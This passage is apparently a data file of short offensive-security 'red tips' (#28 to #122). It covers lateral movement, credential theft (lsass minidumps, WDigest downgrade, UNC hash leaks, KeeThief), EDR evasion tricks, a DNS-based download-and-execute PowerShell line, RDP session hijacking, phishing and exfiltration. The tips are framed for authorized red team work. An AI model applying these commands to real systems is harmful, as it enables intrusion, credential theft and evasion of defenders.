%(tips => 'Red tip #28: Look for asset registers to understand who owns what machine, make and model. Theres usually an asset label to host name too!', tags => @(
'redtip', '#28', 'asset', 'machine', 'host'
)
),
%(tips => 'Red tip #29: Lateral movement: printers, open webroots, good old Tomcat, what are your quick wins?', tags => @(
'redtip', '#29', 'lateral movement', 'printers', 'webroots', 'tomcat'
)
),
%(tips => 'Red tip #30: Get AD credentials? Turn up on site and you might be able to use them to login to Corporate Wifi :)', tags => @(
'redtip', '#30', 'AD', 'credentials', 'site', 'login', 'wifi'
)
),
%(tips => 'Red tip #31: Hunting e-mails and network shares for penetration testing reports can often yield good results.', tags => @(
'redtip', '#31', 'emails', 'network', 'shares', 'reports'
)
),
%(tips => 'Red tip #32: List mounts: net use, look for shared folders and drop a UNC icon LNK into it. Run Inveigh or Wireshark on host to grab hashes.', tags => @(
'redtip', '#32', 'mount', 'list', 'net', 'shared', 'folders', 'LNK', 'Inveigh', 'Wireshark'
)
),
%(tips => 'Red tip #33: Orgs are transitioning to cloud services such as AWS, Beanstalk, O365, Google Apps. 2FA is vital - password reset to compromise.', tags => @(
'redtip', '#33', 'cloud', 'services', 'AWS', 'O365', 'password', 'Apps'
)
),
%(tips => 'Red tip #34: OpSec. Set notifications to your phone for logins or intrusion attempts in any part of your attack infrastructure.', tags => @(
'redtip', '#34', 'Opsec', 'notification', 'phone', 'login', 'infrastructure'
)
),
%(tips => 'Red tip #35: FireEye sandbox flagging your payloads? Try anti sandbox techniques! If not, just use HTA to get into memory as it doesnt scan', tags => @(
'redtip', '#35', 'FireEye', 'sandbox', 'payload', 'HTA', 'memory'
)
),
%(tips => 'Red tip #36: Dont forget the good old GPP passwords in SYSVOL. There may be cached GPP on the machine. Applying the patch isnt enough', tags => @(
'redtip', '#37', 'GPP', 'password', 'SYSVOL', 'machine', 'patch'
)
),
%(tips => 'Red tip #37: Use GenHTA to generate HTA files that use anti-sandboxing techniques. https://github.com/vysec/GenHTA', tags => @(
'redtip', '#37', 'GenHTA', 'HTA', 'files', 'sandbox'
)
),
%(tips => 'Red tip #38: Having trouble getting @armitagehacker CobaltStrikes evil.hta through defenses? https://github.com/vysec/MorphHTA', tags => @(
'redtip', '#38', 'CobaltStrike', 'HTA', 'morphHTA'
)
),
%(tips => 'Red tip #39: If emails get bounced, read the email! Sometimes due to malware scanners, spam etc. Or you may even get an out of office reply.', tags => @(
'redtip', '#39', 'email', 'malware', 'scanner', 'spam'
)
),
%(tips => 'Red tip #40: @0x09AL suggests looking for default credentials on printers and embedded devices. Move off initial foothold using this.', tags => @(
'redtip', '#40', 'credentials', 'printers', 'devices', 'foothold'
)
),
%(tips => 'Red tip #41: @Oddvarmoe suggests using Alternate Data Streams if you need to put a file on disk. For example https://github.com/samratashok/nishang/blob/master/Backdoors/Invoke-ADSBackdoor.ps1', tags => @(
'redtip', '#41', 'ADS', 'Data', 'Streams', 'file', 'disk'
)
),
%(tips => 'Red tip #42: Got OS level access to a middle tier? Task list, netstat and wmic process list full | findstr /I commandline for more ideas!', tags => @(
'redtip', '#42', 'OS', 'access', 'tier', 'wmic', 'process', 'list', 'findstr'
)
),
%(tips => 'Red tip #43: So you know where the server application files are. Download the binaries and check out configuration files for conn. strings', tags => @(
'redtip', '#43', 'server', 'files', 'application', 'binaries', 'config'
)
),
%(tips => 'Red tip #44: Run PEiD and other packer / technology checkers to find out the language and packer used on downloaded server binaries.', tags => @(
'redtip', 'PEiD', 'packer', 'language', 'binaries'
)
),
%(tips => 'Red tip #45: Run strings on the application binary for potentially other cleartext sensitive strings! (Unicode mode too)', tags => @(
'redtip', '#45', 'strings', 'application', 'binary', 'cleartext'
)
),
%(tips => 'Red tip #46: On a VDI? Check out C:\ and other disks for potentially sensitive files other users may have saved there.', tags => @(
'redtip', '#46', 'VDI', 'C:', 'disks', 'sensitive', 'files'
)
),
%(tips => 'Red tip #47: Incase EDR are looking for "net users /domain" try using "net use /dom"', tags => @(
'redtip', '#47', 'EDR', 'net', 'users', 'domain', 'dom'
)
),
%(tips => 'Red tip #48: Is EDR potentially looking for "powershell -encodedcommand"? Try "powershell -ec"', tags => @(
'redtip', '#48', 'EDR', 'powershell', 'encoded', 'command'
)
),
%(tips => 'Red tip #49: Attacking a heavy Macintosh or Linux estate? Send a Office Maldoc with OS checking logic to obtain footholds on either system', tags => @(
'redtip', '#49', 'Mac', 'linux', 'Office', 'OS', 'foothold'
)
),
%(tips => 'Red tip #50: Carbon Black checks for IEX and web req commands. Use powershell "powershell . (nslookup -q=txt calc.vincentyiu.co.uk )[-1]"', tags => @(
'redtip', '#50', 'Carbon Black', 'IEX', 'web', 'powershell'
)
),
%(tips => 'Red tip #51: Cant open C drive? Try \127.0.0.1\c$', tags => @(
'redtip', '#51', 'C:', '127.0.0.1', 'c$'
)
),
%(tips => 'Red tip #52: SC doesnt take credentials. Cant use runas? Try net use \targetip\ipc$ password /u:domain\username then sc to psexec', tags => @(
'redtip', '#52', 'SC', 'credentials', 'runas', 'target', 'ip', 'password', 'domain', 'psexec'
)
),
%(tips => 'Red tip #53: When stick phishing for 2FA, consider using @mrgretzky Evilginx project which logs cookies. https://breakdev.org/evilginx-1-1-release/', tags => @(
'redtip', '#53', 'phishing', 'evilginx', 'logs', 'cookies'
)
),
%(tips => 'Red tip #54: Hide from blue. Volume shadow copy then execute \?\GLOBALROOT\Device\HarddiskVolumeShadowColy1\malware.exe/dll then delete VSC', tags => @(
'redtip', '#54', 'hidden', 'VSS', 'shadow', 'copy', 'execute', 'VSC'
)
),
%(tips => 'Red tip #55: SMB hash leaking using a UNC path for image in page for drive by leak can give you credentials for less mature environments.', tags => @(
'redtip', '#55', 'SMB', 'hash', 'UNC', 'credentials'
)
),
%(tips => 'Red tip #56: Target victims using email authentication such as Microsoft Account on Windows 10? Hash leak exposes full email address!', tags => @(
'redtip', '#56', 'target', 'email', 'authentication', 'microsoft', 'windows'
)
),
%(tips => 'Red tip #57: Working in teams yields better results; and best of all Makes Offensive operations more fun and keeps the adrenaline pumping', tags => @(
'redtip', '#57', 'team', 'operations', 'red'
)
),
%(tips => 'Red tip #58: Discuss business targets and objectives with your clients. This process should set non technical goals such as "ATM spit money"', tags => @(
'redtip', '#58', 'business', 'targets', 'objectives', 'client', 'goals'
)
),
%(tips => 'Red tip #59: Checking whether a server or host is good for egress? Likely to go down? "systeminfo | findstr /i boot"', tags => @(
'redtip', '#59', 'server', 'host', 'egree', 'systeminfo'
)
),
%(tips => 'Red tip #60: Type "query user" to see who else is connected to the machine.', tags => @(
'redtip', '#60', 'query', 'user', 'machine'
)
),
%(tips => 'Red tip #61: Get a quick patch list using wmic qfe list brief. Cross ref KB to bulletins.', tags => @(
'redtip', '#61', 'patch', 'wmic', 'qfe', 'KB'
)
),
%(tips => 'Red tip #62: Found a process of interest? Dont forget to obtain a MiniDump! Use Out-MiniDump https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1', tags => @(
'redtip', '#62', 'process', 'Minidump', 'powershell'
)
),
%(tips => 'Red tip #63: Finally in CyberArk, click policies and see safes but no account? Go to accounts search and search for empty and safes show up', tags => @(
'redtip', '#63', 'CyberArk', 'policies', 'account'
)
),
%(tips => 'Red tip #64: Is WebDav allowed through the gateway? Using http mini redirector? Dont exfiltrate or send in files. WebDav is subject to DLP', tags => @(
'redtip', '#64', 'webdav', 'gateway', 'http', 'redirector', 'DLP'
)
),
%(tips => 'Red tip #65: WebDav mini http redirector: net use * http://totallylegit.com/share . Then start z:', tags => @(
'redtip', '#65', 'webdav', 'mini', 'http', 'redirector'
)
),
%(tips => 'Red tip #66: Found potential MQ creds? ActiveMQ? Try out https://github.com/fmtn/a , works to query MQ endpoints that dont use self signed crt', tags => @(
'redtip', '#66', 'MQ', 'credentials', 'endpoints', 'crt'
)
),
%(tips => 'Red tip #67: Use vssadmin to list and create volume shadow copies', tags => @(
'redtip', '#67', 'vssadmin', 'list', 'volume', 'shadow'
)
),
%(tips => 'Red tip #68: Pivoting into a secure zone that has no DNS or web gateway and need exfil? Netsh port forward pivot UDP 53 to DNS 53 then boom', tags => @(
'redtip', '#68', 'pivot', 'DNS', 'web', 'gateway', 'UDP', 'exfil'
)
),
%(tips => 'Red tip #69: Have blue hidden the ways including winkey+R? Try shift and right click desktop and open command prompt', tags => @(
'redtip', '#69', 'hidden', 'blue', 'winkey', 'command', 'prompt'
)
),
%(tips => 'Red tip #70: Tracked down that putty session? Popped the box? Query user and check the victims logon time and idle times', tags => @(
'redtip', '#70', 'putty', 'session', 'Query', 'user', 'logon', 'time'
)
),
%(tips => 'Red tip #71: Hijack his Session using sc create sesshijack binpath= "cmd.exe /k tscon /dest:" then use putty session', tags => @(
'redtip', '#71', 'session', 'sc', 'hijack', 'putty', 'cmd.exe'
)
),
%(tips => 'Red tip #72: Most people understand email sec wrong. SPF does not mean not spoofable. SPF does nothing without DMARC.', tags => @(
'redtip', '#72', 'email', 'SPF', 'DMARC'
)
),
%(tips => 'Red tip #73: Weak DMARC on victim org domain? Spoof their own emails back into themselves! You even inherit their AD name and photo', tags => @(
'redtip', '#73', 'DMARC', 'domain', 'spoof', 'emails', 'AD'
)
),
%(tips => 'Red tip #74: Got access to Microsoft OWA mailbox or O365? You can extract global catalog from contacts use @Burp_Suite and parse JSON object', tags => @(
'redtip', '#74', 'access', 'microsoft', 'OWA', 'mailbox', 'O365', 'burpsuite'
)
),
%(tips => 'Red tip #75: Write PHP delivery scripts that can mutate your payloads and add unique trackers per download. This tracks file being executed', tags => @(
'redtip', '#75', 'PHP', 'delivery', 'scripts', 'payload', 'download', 'files'
)
),
%(tips => 'Red tip #76: Simulating a criminal threat story with smash and grab agenda? Phish users and hot swap payload mid campaign to test formats', tags => @(
'redtip', '#76', 'criminal', 'agenda', 'phish', 'users', 'campaign'
)
),
%(tips => 'Red tip #77: RCE on a web application for less mature client? nslookup -q=srv _ldap._tcp if its domain joined Invoke-Kerberoast', tags => @(
'redtip', '#77', 'RCE', 'web', 'application', 'client', 'nslookup', 'domain', 'kerberoast'
)
),
%(tips => 'Red tip #78: @benichmt1 suggests looking for vmdk files across the network. You can use this to potentially access segregated networks', tags => @(
'redtip', '#78', 'vmdk', 'files', 'network', 'access'
)
),
%(tips => 'Red tip #79: Obfuscation is never bad, especially when its a button click. @danielhbohannon - https://github.com/danielbohannon', tags => @(
'redtip', '#79', 'Obfuscation', 'danielbohannon'
)
),
%(tips => 'Red tip #80: Need to sweep for uptimes? Use wmic /node:"" OS get LastBootUpTime in a for loop', tags => @(
'redtip', '#80', 'uptime', 'wmic', 'OS'
)
),
%(tips => 'Red tip #81: Looking for systems running KeePass? Run a for loop on wmic /node:"host" process list brief :) then look at RT #82', tags => @(
'redtip', '#81', 'sytems', 'KeePass', 'wmic', 'host', 'process', 'list'
)
),
%(tips => 'Red tip #82: Found KeePass running in memory? Use @harmj0y KeeThief to extract password and dl the KDBX - https://github.com/HarmJ0y/KeeThief', tags => @(
'redtip', '#82', 'KeePass', 'memory', 'harmj0y', 'KeeThief', 'password'
)
),
%(tips => 'Red tip #83: Struggling to find a working DB client? Live off the land and use your victims in an RDP session.', tags => @(
'redtip', '#83', 'DB', 'client', 'RDP', 'session'
)
),
%(tips => 'Red tip #84: Im sure everyone hates Oracle DB but no sweat, you can proxycap sqldeveloper.exe', tags => @(
'redtip', '#84', 'Oracle', 'DB', 'proxycap', 'sql'
)
),
%(tips => 'Red tip #85: Check the users calendars before using persistence on their machine. They may be out of office and screw your master plans.', tags => @(
'redtip', '#85', 'users', 'calendars', 'persistence', 'machine', 'office'
)
),
%(tips => 'Red tip #86: Red team and attack simulation is not penetration testing. You shouldnt be really testing anything, but simply infiltrating.', tags => @(
'redtip', '#86', 'red team', 'attack', 'testing', 'penetration'
)
),
%(tips => 'Red tip #87: @Oddvarmoe uses .UDL files to quickly launch a MSSQL connection test to validate credentials! https://blogs.msdn.microsoft.com/farukcelik/2007/12/31/basics-first-udl-test/', tags => @(
'redtip', '#87', 'UDL', 'files', 'MSSQL', 'credentials'
)
),
%(tips => 'Red tip #88: Dont forget Physical security! Whip up a PI with GSM and you can hack your way in by dropping the PI on network.', tags => @(
'redtip', '#88', 'Physical', 'security', 'PI', 'GSM', 'network'
)
),
%(tips => 'Red tip #89: regsvr32 SCT files are being detected as Squigglydoo. Looks for "script" case sensitive and "<registration" case insensitive.', tags => @(
'redtip', '#89', 'regsvr32', 'SCT', 'files', 'squigglydoo', 'script'
)
),
%(tips => 'Red tip #90: Cisco NGIPS is shit, when analysing traffic for havex it drops only but not', tags => @(
'redtip', '#90', 'Cisco', 'NGIPS', 'traffic', 'analysis'
)
),
%(tips => 'Red tip #91: Decoys can be as simple as burning egress by port scanning 1-1024 through IDS, or spamming dodgy emails at blocks of employees', tags => @(
'redtip', '#91', 'egress', 'port', 'scanning', 'IDS', 'emails'
)
),
%(tips => 'Red tip #92: If WDigest is disabled, reenable it for cleartext credentials before new users login with @harmj0y https://github.com/HarmJ0y/Misc-PowerShell/blob/master/Invoke-WdigestDowngrade.ps1', tags => @(
'redtip', '#92', 'wdigest', 'credentials', 'login'
)
),
%(tips => 'Red tip #93: Use Empyre to generate Macintosh and Linux payloads, modify it to contain code for Windows too! https://github.com/EmpireProject/EmPyre', tags => @(
'redtip', '#93', 'Empire', 'MAC', 'linux', 'payload', 'Empyre'
)
),
%(tips => 'Red tip #94: Client uses VDIs? Compromise underlying host and use Citrix Shadow Taskbar to spy on VDI sessions by selecting username', tags => @(
'redtip', '#94', 'VDI', 'Citrix', 'host'
)
),
%(tips => 'Red tip #95: @domchell recommends avoiding non persistent VDIs and persist on laptops. Query DC for live laptops.', tags => @(
'redtip', '#95', 'VDI', 'persistence', 'DC', 'laptop'
)
),
%(tips => 'Red tip #96: @lucasgates recommends using OLE objects containing VBS scripts instead of Macros as less suspicious. VBE will work too', tags => @(
'redtip', '#96', 'OLE', 'VBS', 'scripts', 'Macros', 'VBE'
)
),
%(tips => 'Red tip #97: Use recent critical vulnerabilities such as CVE-2017-0199 HTA handler issue to simulate real threats. https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/', tags => @(
'redtip', '#97', 'vulnerabilities', 'CVE', 'HTA'
)
),
%(tips => 'Red tip #98: @0x09AL suggests WordSteal. You can embed an IMAGE with UNC path to steal hashes from Word. Wont work if proxy. https://github.com/0x09AL/WordSteal', tags => @(
'redtip', '#98', 'WordSteal', 'image', 'UNC', 'word'
)
),
%(tips => 'Red tip #99: If client is using Proxy with WebDav you can phish creds using @ryHanson Phishery https://github.com/ryhanson/phishery', tags => @(
'redtip', '#99', 'client', 'Proxy', 'WebDav', 'phish', 'creds'
)
),
%(tips => 'Red tip #100: Use wgsidav if you need a quick WebDav server :) https://github.com/mar10/wsgidav', tags => @(
'redtip', '#100', 'wgsidav', 'webdav', 'server'
)
),
%(tips => 'Red tip #101: Set up red team infrastructure following @bluscreenofjeff guidelines! https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki', tags => @(
'redtip', '#101', 'red team', 'infrastructure', 'jeff', 'wiki'
)
),
%(tips => 'Red tip #102: Easier DNS redirector! https://pastebin.com/LNj4zjFs for opsec and not hosting C2 on the cloud', tags => @(
'redtip', '#102', 'DNS', 'redirector', 'opsec', 'c2'
)
),
%(tips => 'Red tip #103: Red team tips are useful but what makes the good red teamer is experience. Rack up that breadth of experience', tags => @(
'redtip', '#103', 'experience', 'tips'
)
),
%(tips => 'Red tip #104: SessionGopher does a decent job at retrieving putty and RDP history - https://github.com/fireeye/SessionGopher', tags => @(
'redtip', '#104', 'SessionGopher', 'putty', 'RDP', 'history'
)
),
%(tips => 'Red tip #105: If ping 8.8.8.8 works, try ICMP tunneling. More info at http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-5.html?m=1 from @fragsh3ll though only on immature network', tags => @(
'redtip', '#105', 'ping', 'ICMP', 'tunneling'
)
),
%(tips => 'Red tip #106: Wordlists? https://github.com/berzerk0/Probable-WordlistsI like to use the top probable 297 million list with Deadhobo rules', tags => @(
'redtip', '#106', 'Wordlists', 'rules', 'list'
)
),
%(tips => 'Red tip #107: More of a pentest tip but nslookup http://google.com if it resolves you may have a DNS tunneling problem.', tags => @(
'redtip', '#017', 'pentest', 'nslookup', 'DNS', 'tunneling'
)
),
%(tips => 'Red tip #108: Post exploitation Asset Discovery https://github.com/vysec/Invoke-DNSDiscovery looks for assets by name that might be good if youre low priv user.', tags => @(
'redtip', '#108', 'exploitation', 'asset', 'DNS', 'user'
)
),
%(tips => 'Red tip #109: Use Invoke-ProcessScan to give some running processes context on a system. This uses EQGRP leaked list- https://github.com/vysec/Invoke-ProcessScan', tags => @(
'redtip', '#109', 'process', 'scan', 'EQGRP'
)
),
%(tips => 'Red tip #110: Mature blue? Be careful and minidump lssas.exe then download it and parse locally', tags => @(
'redtip', '#110', 'mature', 'blue', 'minidump', 'lssas'
)
),
%(tips => 'Red tip #111: Found an exploitable S4U condition? Use Mistique to attack! https://github.com/machosec/Mystique/blob/master/Mystique.ps1', tags => @(
'redtip', '#111', 'S4U', 'Mistique'
)
),
%(tips => 'Red tip #112: Need to use VNC as RDP in use? https://github.com/artkond/Invoke-Vnc has been pretty stable for me. Run it then pivot in and connect!', tags => @(
'redtip', '#112', 'VNC', 'RDP', 'pivot'
)
),
%(tips => 'Red tip #113: Found super secret.doc or master password database.xlsx? Use office2john to get hash and crack in Hashcat!', tags => @(
'redtip', '#113', 'password', 'database', 'xlsx', 'hashcat'
)
),
%(tips => 'Red tip #114: PowerUp didnt work and you want to autoruns? Dont bother going on disk, use Invoke-AutoRuns to csv- https://github.com/p0w3rsh3ll/AutoRuns', tags => @(
'redtip', '#114', 'PowerUp', 'autoruns', 'powershell'
)
),
%(tips => 'Red tip #115: Need to zip up a directory quickly for easy exfiltration? Eg. Home shares https://github.com/thoemmi/7Zip4Powershell use Powershell', tags => @(
'redtip', '#115', 'zip', 'exfil', 'powershell'
)
),
%(tips => 'Red tip #116: Use CatMyFish to search for categorised domains that could be used in your engagements - https://github.com/Mr-Un1k0d3r/CatMyFish', tags => @(
'redtip', '#116', 'CatMyFish', 'domains', 'engagements'
)
),
%(tips => 'Red tip #117: Ran Invoke-MapDomainTrusts from PowerView? Use @harmj0y DomainTrustExplorer to generate a graph - https://github.com/sixdub/DomainTrustExplorer', tags => @(
'redtip', '#117', 'PowerView', 'domain', 'trust', 'graph'
)
),
%(tips => 'Red tip #118: FOCA finds some useful information for OSINT and intelligence phases. https://www.elevenpaths.com/labstools/foca/index.html', tags => @(
'redtip', '#118', 'FOCA', 'OSINT', 'intelligence'
)
),
%(tips => 'Red tip #119: GoPhish is a pretty useful tool for spinning up simple phishing campaigns especially for decoys https://getgophish.com', tags => @(
'redtip', '#119', 'GoPhish', 'tool', 'phishing', 'email', 'campaigns'
)
),
%(tips => 'Red tip #120: If you have write access to the orgs shared Office template folders You can privesc by backdooring these trusted documents.', tags => @(
'redtip', '#120', '', '', ''
)
),
%(tips => 'Red tip #121: @zwned uses netsh packet tracing to sniff natively from victim host. Save capture and analyze offline!', tags => @(
'redtip', '#121', 'netsh', 'packet', 'sniff', 'capture'
)
),
%(tips => 'Red tip #122: More decoy tips! Scan the external perimeter with tools like Nessus and OpenVAS. More traffic the better just to burn the blue', tags => @(
'redtip', '#122', 'decoy', 'external', 'perimeter', 'Nessus', 'OpenVAS'